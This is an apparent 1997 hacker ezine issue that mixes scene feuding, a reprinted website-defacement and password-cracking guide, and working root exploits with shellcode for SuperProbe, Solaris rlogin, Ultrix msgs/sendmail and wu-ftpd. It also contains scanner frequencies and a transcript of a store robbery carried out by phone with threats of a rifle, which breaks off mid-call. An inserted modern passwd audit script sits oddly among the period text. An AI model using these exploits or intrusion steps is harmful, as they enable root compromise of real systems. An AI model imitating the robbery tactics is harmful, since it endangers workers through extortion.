===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue  : 001.                     =--------------------=
=--------------------= Date   : April 16th 1997.         =--------------------=
=--------------------=====================================--------------------=
===============================================================================

==================> http://www.codez.com UP FUCKEN NOW!@# <==================

===============================================================================

                          .:. Site Of The Month .:.

-----------------------> http://micros0ft.paranoia.com <-----------------------

In This Issue :

-----=> Section A : Introduction And Cover Story.

1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan
2. sIn eXposed........................................: The CodeZero + Friends

-----=> Section B : Exploits And Code.

1. SuperProbe.........................................: Solar Designer
2. Ultrix Exploit.....................................: StatioN
3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson
4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz
5. portmsg.c..........................................: Some FTP Someplace..

-----=> Section C : Phones / Scanning / Radio.

1. Fast Food Restaurant Frequencies...................: Dj Gizmo
2. Robbing Stores With Phones, A Real Example.........: The CrackHouse
3. How To Rewire Your House For Free Phone Calls......: WildFire

-----=> Section D : Miscellaneous.

1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan
2. Virus Definitions..................................: so1o
3. Fun With whois, sinnerz.com........................: so1o
4. Hacking Space Shuttles, Abort Codes................: NailGun
5. Country Domain Listing.............................: SirLance

-----=> Section E : World News.

1. CoreWars...........................................: so1o / odphreak
2. Technophoria Want A Piece Of CodeZero Too?.........: so1o
3. Global kOS Press Release...........................: Spidey
4. www.ncaa.com Hack Makes News.......................: so1o
5. CodeZero To Release sunOS 5.x RootKit..............: so1o
6. Too Many nethosting.com Break-Ins..................: so1o
7. sulfur of #hack to print a bi-monthly magazine.....: so1o
8. 2600 Printers go bust and take $9000 with them.....: so1o

-----=> Section F : Projects.

1. IP Spoofing Programs And Utilities.................: Dr_Sp00f
2. Using LinuxRootKitIII..............................: suid

-----=> Section G : The End.

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan

Confidence Remains High will be issued EVERY 50 DAYS as from April 16th...

It is free, not like 2600, or sulfur's soon to be released Access Denied, which
both cost *YOU*, the reader, MONEY, cash, $$$ etc., which we don't like, because
information should be free, and so we bring you Confidence Remains High, with
news, exploits, scanning, telco, and enough shit to make you wonder "why did I
ever pay cash for this?!" Anyway, on with the show...

==================> http://www.codez.com UP FUCKEN NOW!@# <==================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================

Confidence Remains High is issued every 50 days as from April 16th; at that
rate, issue 20 will be released on New Year's Day 2000 (if we go that far!)

Tetsu Khan.

2. sIn eXposed : CodeZero + Friends.
If you can't be bothered to read all this shit, just go to...

---------------> www.sinnerz.com/bible.htm <---------------

...And view the lameness for yourself :)

-------------------------------------------------------------------------------

Concerning the news in issue 2 of the CodeZero technical journal, we found this
response (http://www.sinnerz.com/codezero.txt) :

   So has anyone here heard of Codezero? Its some ezine type shit that i just
   wanted to expose as bullshit. I had never heard of it till i talked to
   darkfool and he showed me... You can check it out at neonunix.org/codezero.
   It is pretty good for a laugh. When me and Banshee and Messiah first read it
   we all were in #sin and the first thing to come to our mind was.. wtf is
   this? Some hacker gossip column or what? Even more funny was the surprise i
   got when i saw that the editor was Tetsu Khan (so1o who was mentioned
   earlier in the Bible)... that brought a smile to my face to see that.
   Anyways so i was reading thru issue 2 of codezero and i happend to see a lot
   of bogus information...stuff said that wasn't true. Same with the first
   issue. Examples our comments like "Infected has some new programs coming
   out soon including Utopia an encryption program by The Messiah." Anyways im
   doing the algorithm for that program with Messiah and it is not going to be
   out for a long time... Messiah has a lot of plans for the future all coming
   before Utopia does....

Those are the exact, untouched words of HosTie of SiN. Hmmm, let's examine that
passage more closely...

   "some ezine type shit that i just wanted to expose as bullshit..."

   "i was reading thru issue 2 of codezero and i happend to see a lot of bogus
   information...stuff said that wasn't true..."

This is very interesting indeed: that they should care about a small news
section in the journal, isn't it? Seeing that we published how many lines about
them? A whole 20, I hear you say? Hmm... doesn't the journal have exploits and
other stuff in it too? I think it does...

   "Anyways im doing the algorithm for that program with Messiah and it is not
   going to be out for a long time... Messiah has a lot of plans for the
   future all coming before Utopia does...."

So then HoStie, you can program now? That's new, and *YOU* are coding the
algorithm? Interesting... WAIT! You are saying that Utopia is true? And that we
did publish correct information? I always thought so, seeing that the truth is
that you probably wanted your beautiful new program to be a big surprise to the
"scene"... Heh, how silly of me to actually think you had a clue! You just
can't take it that you are stuck in a lame fuck group of wannabes and the truth
is finally coming out... Let us examine more examples found on www.sinnerz.com :

   It also had some shit like "4 new hacks were reported this month" and they
   were right on the 4 new hacks part but they put bogus shit about them. The
   catch22 one they happend to put the html for it.. well they put the wrong
   shit that was on it. Becuz on the catch22 hack Darkfool had put the names
   of all the SIN members on the page. Which they decided to leave out... also
   They put some weird shit which they said was on the 2 hacks Darkfool did.
   Where it was the entersin.gif from our page that was there with a bunch of
   other links. Anyways there is also a lot of other shit that was bullshit in
   both of their issues...

SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack?? And
SiN was linked to the hacks too?? That is interesting news HoSTie, seeing you
just could have landed one of your SiN members in trouble, as CodeZero didn't
mention any names concerning the catch22.com hack, and the very first
index.html to go up, which was the one we published, was in fact very correct;
it's just that the index.html must have changed how many times that day?
Hmmm...

   "...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put
   the names of all the SIN members on the page. Which they decided to leave
   out..."

Strange... seeing another hacker, by the name of Sventa, was blamed entirely
for the attacks. Oh yeah, one last thing: in the index.html that was apparently
modified by Darkfool of SiN, there were 8 numbers. We know what they stand for,
SiN doesn't; all will be explained one day, as SiN are cl00less and need a good
kicking.

Let us continue, with a "hacking guide" taken from www.sinnerz.com :

--------------------------------------------------------------------

                       _________ ___ _______
  \~=._     _.=~/     / _____/ |   |  \    \      \~=._     _.=~/
   \  ~=__=~  /       \_____  \ |   | /   |  \      \  ~=__=~  /
    \_.=~ ~=._/       /        \|   |/    |   \      \_.=~ ~=._/
 _.=~  \   /  ~=._   /_______  /|___|\____|__  /   .=~  \   /  ~=.
L------\------/------7       \/             \/  L------\------/------7
        \    /           http://www.sinnerz.com          \    /
         \  /                                             \  /
          \/                                               \/

OK, this is my mini guide to the easiest 'hacking' there is ( I think ). If any
one knows different then mail me and tell me :) .

Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But alongside /pub you will probably find
other directories such as /bin and /etc. It's the /etc directory which is
important. In this directory there is normally a file called passwd. This looks
something like this :-

root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh

This is where all the user names and passwords are kept. For example, root is
the superuser and the rest are normal users on the site. The bit after the word
root or mcn, such as in this example (EUyd5XAAtv2dA), is the password BUT it is
encrypted. So you use a password cracker....which you can d/l from numerous
sites which I will give some URL's to at the end of this document. With these
password crackers you will be asked to supply a passwd file which you download
from the \etc directory of the FTP server and a dictionary file which the
cracker program will go through and try to see if it can make any match. And as
many people use simple passwords you can use a 'normal' dictionary file. But
when ppl REALLY don't want you to break their machines they set their passwords
to things such as GHTiCk45 which Random Word Generator will create
(eventually). Which is where programs such as Random Word Generator come in.
( Sorry just plugging my software )

BTW the bad news is that new sites NORMALLY have password files which look like
this :-

root:x:0:1:0000-Admin(0000):/:/sbin/sh

The x signifies shadowed - you can't use a cracker to crack it because there's
nothing there to crack, it's hidden somewhere else that you can't get to. x is
also represented as a * or sometimes a . Ones like the top example are known as
un-shadowed password files normally found at places with .org domain or .net
and perhaps even .edu sites. (Also cough .nasa.gov cough sites).

If you want a normal dictionary file i recommend you go to
http://www.globalkos.org and download kOS Krack which has a 3 MEG dictionary
file. Then run a .passwd cracking program such as jack the ripper or hades or
killer crack ( I recommend ) against the .passwd file and dictionary file.
Depending upon the amount of passwords in the .passwd file, the size of the
dictionary file and the speed of the processor it could be a lengthy process.

Eventually once you have cracked a password you need a basic knowledge of unix.
I have included the necessary commands to upload a different index.html file to
a server :-

Connect to a server through ftp preferably going through a few shells to hide
your host and login using the hacked account at the Login: Password: part.
Then once connected type dir or list. If there's a directory called
public_html@ or something similar change directory using the simple DOS cd
command ( cd public_html ). Then type binary to set the mode to binary transfer
( so you can send images if necessary ). Then type put index.html or whatever
the index file is called. It will then ask which transfer you wish to use,
Z-Modem is the best. Select the file at your end you wish to upload and send
it. That's it ! If you have root delete any log files too. Please note that
this process varies machine to machine.

To change the password file for the account ( very mean ) login in through
telnet and simply type passwd at the prompt and set the password for the
account to anything you wish.

That's it....if ya don't understand it read it about 10x, if ya still don't ask
someone else, i am too busy with errrr stuff..

Links :-

http://www.sinnerz.com   Where you got this I hope.

Stay cool and be somebody's fool everyone

Darkfool
darkfool@pancreas.com
http://www.sinnerz.com

---

Ummm, *NEWS FLASH*, let's see shall we, this tells attackers to retrieve the
passwd file using what?! FTP I hear you scream? Well, let's see shall we
children, gather 'round...

   "Most FTP servers have the directory /pub which stores all the 'public'
   information for you to download. But alongside /pub you will probably find
   other directories such as /bin and /etc. It's the /etc directory which is
   important. In this directory there is normally a file called passwd. This
   looks something like this :-"

Oh dear, oh dear, oh dear, let's look at the FACTS :

   Common FTP passwd path : /home/ftp/etc/passwd
   *REAL* passwd path     : /etc/passwd

Hmm, let's see, anyone with a clue would know that the FTP passwd file is not
real, it is only there to mislead little wannabes, examples include members of
SiN. We continue...

   "Eventually once you have cracked a password you need a basic knowledge of
   unix. I have included the necessary commands to upload a different
   index.html file to a server :- Connect to a server through ftp preferably
   going through a few shells to hide your host and login using the hacked
   account at the Login: Password: part. Then once connected type dir or list.
   If there's a directory called public_html@ or something similar change
   directory using the simple DOS cd command ( cd public_html ). Then type
   binary to set the mode to binary transfer ( so you can send images if
   necessary ). Then type put index.html or whatever the index file is called.
   It will then ask which transfer you wish to use, Z-Modem is the best.
   Select the file at your end you wish to upload and send it. That's it !"

Okay, so now SiN defines hacking as downloading the /home/ftp/etc/passwd, which
is a decoy, then proceeding to get kOS Krack (last time I checked
www.globalkos.org was down), then trying to crack the passwd file and finally
using FTP to upload an index.html? How imaginative and original; pity all of
this info you have been fed is absolute crap, with a success rate of
practically zero.

One last thing...

   "If you have root delete any log files too."

Umm, but you haven't told all our wannabe hackers that read your shit where the
log files are found, seeing that you have to find them, delete them, then touch
them. Oh yeah, I thought you were using FTP? Strange...

I'm sure that from these examples we have forwarded to you we have started to
prove the truth behind SiN, seeing they are actually quite lame wannabes with
very minimal skills... this has been shown, and we will continue to add to this
hall of shame for SiN, as until now no-one has stood up to them, but now it is
time for a change.

Watch this space my friends,

Until next time...

T_K

I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!!

-- so1o
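The whole guide above turns on one property of a passwd file: whether the second field holds a real hash (crackable offline with a wordlist once the file leaks) or a shadow marker, and CodeZero's rebuttal turns on which passwd file you are even looking at (an anonymous FTP area is chrooted into ~ftp, so ~ftp/etc/passwd is a separate copy kept so that ls can map UIDs to names, and it should never carry real hashes). What follows is an administrator-side audit for exactly that, added to this reprint; it is not part of the zine, of the sinnerz.com guide, or of any cracker the guide names, and it uses nothing beyond the Python standard library. It parses passwd(5)-style lines and reports hashes present in the file, empty password fields, accounts that share an identical hash (same salt and same password, which is what tvr and mouse show in the listing above), and UID 0 accounts other than root. The first sample is the guide's own listing; the shadowed root line is the guide's too, while the guest and toor accounts beside it are constructed for the example.

```python
"""Audit a passwd(5)-format file for exposed hashes and related weaknesses.

Added example for this reprint, not part of the original zine or of any
password cracker it mentions. The un-shadowed listing and the shadowed
root line are quoted from the guide above; the guest/toor accounts are
constructed.
"""
from collections import defaultdict
from dataclasses import dataclass

# Second-field values that mean "no hash here": shadowed or locked accounts.
SHADOW_MARKERS = {"x", "*", "!", "!!", "NP"}


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd lines; short lines (like the guide's root line) are padded."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: not a passwd entry: {raw!r}")
        fields += [""] * (7 - len(fields))
        name, pw, uid, gid, gecos, home, shell = fields[:7]
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def classify_password_field(pw):
    """'hash' is crackable offline; 'shadowed' means the hash lives elsewhere
    or the account is locked; 'empty' means no password at all."""
    if pw == "":
        return "empty"
    if pw in SHADOW_MARKERS or pw.startswith("*") or pw.startswith("!"):
        return "shadowed"
    return "hash"


def audit_passwd(text):
    """Return a list of findings; an empty list means nothing to report."""
    findings = []
    by_hash = defaultdict(list)
    for e in parse_passwd(text):
        kind = classify_password_field(e.password)
        if kind == "empty":
            findings.append(f"{e.name}: empty password field")
        elif kind == "hash":
            findings.append(f"{e.name}: password hash exposed in passwd file")
            by_hash[e.password].append(e.name)
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 but not root")
    # Identical hash strings share the salt and therefore the password:
    # crack one account and you have the other for free.
    for names in by_hash.values():
        if len(names) > 1:
            findings.append("shared hash (same salt and password): " + ", ".join(sorted(names)))
    return findings


# Listing quoted in the guide above (un-shadowed file).
SAMPLE_UNSHADOWED = """\
root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh
"""

# The guide's shadowed root line plus two constructed accounts that trigger
# the empty-password and non-root-UID-0 checks.
SAMPLE_SHADOWED = """\
root:x:0:1:0000-Admin(0000):/:/sbin/sh
guest::1200:20:Guest account:/tmp:/bin/sh
toor:x:0:0:Spare superuser:/:/bin/sh
"""

if __name__ == "__main__":
    for label, sample in (("unshadowed", SAMPLE_UNSHADOWED), ("shadowed", SAMPLE_SHADOWED)):
        print(f"== {label} ==")
        for finding in audit_passwd(sample) or ["nothing to report"]:
            print("  " + finding)
```

Run it over the real /etc/passwd and over the copy under the anonymous FTP root: the first should report no exposed hashes on a shadowed system, and the second should report none at all, since a decoy only works if there is nothing real in it.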
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================

1. SuperProbe : Solar Designer

/*
 * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
 * by Solar Designer 1997.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
  "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
  "\x31\xdb\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
  asm("movl %esp,%eax");
}

#define bufsize 8192
#define alignment 0

char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize / 2; i += 4)
    *(char **)&buffer[i] = get_sp() - 2048;
  memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
  strcpy(&buffer[bufsize - 256], shellcode);
  setenv("SHELLCODE", buffer, 1);

  memset(buffer, 'x', 72);
  *(char **)&buffer[72] = get_sp() - 6144 - alignment;
  buffer[76] = 0;

  execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}

2. Ultrix Exploit : StatioN

This bug has been fixed in OSF, but not in Ultrix. It should also work on any
system that has the msgs mail alias.

$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"

Ok, the first thing to do is look in the /usr/msgs directory (or whatever the
directory is where the msgs files are kept), and see what the next msgs file
will be (if there is 1 and 2, then the next one is pretty easy to figure out).
Then, make an executable /tmp/a that like makes a suid shell (this is pretty
easy to do, if you can't do it, don't consider yourself a hacker).

By default, newsyslog executes every 6 days at 4 am, but it depends on the setup
in crontab. What it does is age the syslog file (at /usr/adm/syslog.1, .2, ...,
i think).

symlink /usr/msgs/ -> /usr/adm/newsyslog

$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit

So now, when it writes to /usr/msgs/, it will overwrite /usr/adm/newsyslog, and
since /usr/adm/newsyslog is a shell script, it will expand `/tmp/a` by executing
/tmp/a AS ROOT, giving you an suid shell or whatever /tmp/a does. From there,
just clean up after yourself.

StatioN

3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson

/*
 * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
 * by exploiting the gethostbyname() overflow in rlogin.
 *
 * gcc -o rlogin-exploit rlogin-exploit.c
 *
 * Jeremy Elson,
 * jeremy.elson@nih.gov
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH      8200
#define EXTRA           100
#define STACK_OFFSET    4000
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen((char *) sparc_shellcode);

  long_p = (u_long *) buf;

  /* fill the front of the buffer with NOPs */
  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;
  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;

  printf("Jumping to address 0x%lx\n", targ_addr);

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  perror("execl failed");
}

4. wu-ftpd 2.4(1) Exploit : Eugene Schultz

This sploit is a teeny bit outdated, but I have been asked by many people about
exploiting FTP recently... This shows you how to use the wuftp2.4(1) hole to
gain root.
------------------------------------------------------------

On the VICTIM system, compile the following C code:
---------------------------------------------------

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setuid(0);
    seteuid(0);
    system("cp /bin/sh /tmp/suidroot");
    system("chmod a+rwxs /tmp/suidroot");
    return 0;
}

Now create a shell script, called root.sh, that contains the following:
-----------------------------------------------------------------------

exec a.out        <----- a.out is the name of the compiled C code

Now, FTP localhost, login as your account on that system and:
-------------------------------------------------------------

ftp> quote site exec sh root.sh

Then quit FTP and execute /tmp/suidroot to become root!

5. portmsg.c : Some FTP Someplace..

/**************************************************************************/
/* portmsg - generate a message on a port, then close connection          */
/*                                                                        */
/* Usage: portmsg file port                                               */
/*                                                                        */
/* When a telnet client connects to the specified port, the               */
/* text from the file will be echoed to the user. After a                 */
/* short delay the connection will close.                                 */
/*                                                                        */
/* eg. portmsg /etc/passwd 666                                            */
/*                                                                        */
/**************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/param.h>
#include <netinet/in.h>

/* reap exited children so they do not linger as zombies */
void wait_on_child(int sig)
{
    int status;

    (void) sig;
    while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0)
        ;
}

/* the client went away before we finished writing: just exit */
void lostconn(int sig)
{
    (void) sig;
    exit(1);
}

int main(int argc, char *argv[])
{
    int msgfd, n;
    struct stat statBuf;
    int port;
    char *msg;
    size_t msg_len;
    int sockfd, newsockfd;
    socklen_t addrlen;
    int opt;
    struct sockaddr_in tcp_srv_addr;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        fprintf(stderr, "Usage: portmsg file port\n");
        exit(1);
    }

    port = atoi(argv[2]);
    if (port == 0) {
        fprintf(stderr, "error: bad port number [%s]\n", argv[2]);
        exit(1);
    }

    if ((msgfd = open(argv[1], O_RDONLY)) < 0) {
        fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]);
        exit(1);
    }

    /* read the message */
    fstat(msgfd, &statBuf);
    if (statBuf.st_size <= 0) {
        fprintf(stderr, "error: message file [%s] is empty\n", argv[1]);
        exit(1);
    }
    msg_len = (size_t) statBuf.st_size;
    msg = malloc(msg_len);
    if (msg == NULL || read(msgfd, msg, msg_len) != (ssize_t) msg_len) {
        fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]);
        exit(1);
    }
    close(msgfd);

    /* become a daemon */
    switch (fork()) {
    case -1:
        fprintf(stderr, "error: can't fork\n");
        exit(1);
    case 0:
        break;
    default:
        exit(0);
    }

    /* new session, no controlling tty (replaces the BSD setpgrp() plus
     * TIOCNOTTY sequence of the original) */
    if (setsid() == -1) {
        fprintf(stderr, "error: can't change process group\n");
        exit(1);
    }

    (void) signal(SIGCHLD, wait_on_child);

    memset(&tcp_srv_addr, 0, sizeof(tcp_srv_addr));
    tcp_srv_addr.sin_family = AF_INET;
    tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    tcp_srv_addr.sin_port = htons(port);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        fprintf(stderr, "can't create stream socket\n");
        exit(-1);
    }

    opt = 1;
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *) &opt,
                   sizeof(opt)) < 0) {
        perror("setsockopt");
        exit(1);
    }

    if (bind(sockfd, (struct sockaddr *) &tcp_srv_addr,
             sizeof(tcp_srv_addr)) < 0) {
        fprintf(stderr, "can't bind local address\n");
        exit(-1);
    }

    listen(sockfd, 5);

main_again:
    addrlen = sizeof(their_addr);
    newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen);
    if (newsockfd < 0) {
        if (errno == EINTR)
            goto main_again;
        fprintf(stderr, "accept error\n");
        exit(-1);
    }

    switch (fork()) {
    case -1:
        fprintf(stderr, "server can't fork\n");
        exit(-1);
    case 0:
        dup2(newsockfd, 0);
        dup2(newsockfd, 1);
        for (n = 3; n < NOFILE; n++)
            close(n);
        break;
    default:
        close(newsockfd);
        goto main_again;
    }

    /* daemon child arrives here */
    (void) signal(SIGPIPE, lostconn);
    (void) signal(SIGCHLD, SIG_IGN);

    /* fwrite, not fprintf(stdout, msg): the file is data, not a format
     * string, and malloc() never gave it a terminating NUL */
    fwrite(msg, 1, msg_len, stdout);
    (void) fflush(stdout);

    sleep(5);
    exit(0);
}

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================

1. Fast Food Restaurant Frequencies : Dj Gizmo

If you've got a scanner and/or transceiver that works with these frequencies,
then you could have some serious phun...
------------------------------------------------------------------------------- RESTAURANT CUSTOMER (R) CLERK (I) LOCATION ------------------------------------------------------------------------------- Arby's 30.8400 154.5700 Nationwide Bess Eaton Donut 457.5375 467.7625 Rhode Island Big Boy 30.8400 154.5700 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area Burger King 30.8400 154.5700 UNKNOWN OH area 31.0000 170.3050 UNKNOWN GA area 33.4000 154.5400 Frederick, MD 457.5500 467.7750 Baltimore, MD area 457.5625 467.7875 Nationwide 457.5750 467.8000 UNKNOWN area 457.6000 467.8250 UNKNOWN area 460.8875 465.8875 Nationwide 461.5375 UNKNOWN UNKNOWN OH area Burgerville 30.8400 154.5700 UNKNOWN OH area Dairy Queen 30.8400 154.5700 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 920.2625 WFM UNKNOWN Halifax, Nova Scotia Dunkin Donuts 30.8400 154.5700 UNKNOWN NH area 33.1600 154.5150 UNKNOWN NH area 33.4000 154.5400 UNKNOWN NH area El Mexicano 464.9625 469.9625 Germantown, MD G.D. Ritzy's 35.1000 UNKNOWN UNKNOWN OH area Hardee's 30.8400 154.5700 Nationwide 31.0000 170.3050 UNKNOWN NC area 457.5375 467.7625 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.1125 466.1125 Aurora, IL area Jack in the Box 33.4000 154.5400 San Jose, CA Kenny Rogers Roasters 469.0125 464.0125 Frederick, MD Chicken Kentucky Fried Chicken 30.8400 154.5700 Occoquan, VA area 31.0000 170.3050 UNKNOWN MN area 33.1400 151.8950 UNKNOWN OH area 35.0200 154.6000 Frederick, MD 457.5875 467.8125 Vienna, VA area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 Washington, DC area 462.7625 467.8875 Washington, DC area McDonald's CANADA 30.8400 151.6700 main freq. Canada 30.8400 154.1450 aux. freq. Canada McDonald's U.S.A. 
30.8400 154.5700 San Diego, CA area 31.0000 170.3050 UNKNOWN OH/NC area 33.1400 151.8950 Nationwide 33.1400 170.3050 Southfield, MI area 33.4000 154.5400 Frederick, MD 33.4000 154.5700 UNKNOWN area ** 35.0200 151.8950 UNKNOWN area ** 35.0200 154.4900 Decatur, IN area 35.0200 154.6000 Nationwide 151.7150 169.4450 Washington, DC area 151.7450 UNKNOWN UNKNOWN OH area 151.7750 171.9050 UNKNOWN OH area 154.5700 170.2450 Nationwide 154.6000 171.1050 Nationwide 155.0000 UNKNOWN UNKNOWN OH area 457.5375 461.0875 UNKNOWN OH area 457.5500 467.7750 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0375 466.0375 UNKNOWN OK/CA area 461.0875 466.0875 UNKNOWN OH area 462.1625 467.1625 UNKNOWN OH area 463.2875 468.2875 UNKNOWN NY area 464.5125 UNKNOWN UNKNOWN OH area 469.0125 464.0125 Germantown, MD 469.1875 464.1875 Frederick, MD 920.5000 WFM 903.5000 WFM Gaithersburg, MD Rally's 457.5375 468.3875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.5375 462.1625 Holland OH area Roy Rogers 30.8400 154.5700 Germantown, MD 457.5375 467.7625 Washington, DC area 469.0125 464.0125 Germantown, MD 469.9250 464.9250 Vienna, VA Taco Bell 30.8400 154.5700 Washington, DC area 33.1600 154.5150 Frederick, MD 33.4000 154.5400 Germantown, MD 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.5375 UNKNOWN UNKNOWN OH area 464.9625 469.9625 UNKNOWN OH area 469.0125 464.0125 Reston, VA Wendy's 33.4000 154.5400 Rockville, MD 49.8300 49.8900 UNKNOWN area ** 457.5125 467.7375 UNKNOWN OH area 457.5375 467.7625 UNKNOWN OH area 457.6125 467.8375 Washington, DC area 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.8125 UNKNOWN UNKNOWN OH area 464.3750 UNKNOWN Headquarters 464.5125 UNKNOWN Columbus, OH area White Castle 457.6000 467.8250 UNKNOWN OH area 461.8125 UNKNOWN Columbus, OH area - Have Phun! 2. 
Robbing Stores With Phones, A Real Example : The CrackHouse the following is a transcript of a teleconference robbery of a Wawa convience store, all names remain the same to fully implicate the guilty. the sad thing is this is an actual transcript. dk: Hello, listen very carefully I'm not going to repeat myself. manager: Who is this? dk: Don't worry about that, listen carefully, don't interrupt. Are you the manager and if so what is your name? manager: yes, i'm the manager, my names kathy. dk:ok kathy, look across the street do you see the apartment complex directly opposite you? manager: yes. dk: i have a man stationed in a car in that complex's parking lot. he has a high powerd assault rifle aimed at the individual behind the counter. i have another man stationed adjacent to the Wawa with a cellular phone. what's the individual's name behind the cash register? manager: her names Lori, please don't hurt anyone. dk: no ones going to get hurt as long as you shut the fuck up and do exactly as i say. instruct lori that she is to keep her hands on the counter at all times, with her palms laid out flat. shes only to move when she must make change for a customer, do not alert any customers in the store kathy. do you understand me? manager: yes i understand, hold on. (kathy then instructs lori) please promise you won't hurt anyone? please. dk: no ones getting hurt, now we got 30 seconds kathy from when i say go, when i say go you grab a plastic bag, fill it with all the money in the register furthest from the doorway and open the back door and leave all the money there, then shut and lock the door. manager: ok ok, do you want the foodstamps? dk: no! the foodstamps go in a seperate bag. sulfur: and get me a gatorade. manager: a gatorade? what kind? sulfur: if it's not a large im gonna open fire. manager: ok just please don't hurt anyone. dk: ok kathy, go! (theres a rustling of bags and some background noise) manager: ok, done, now what? 
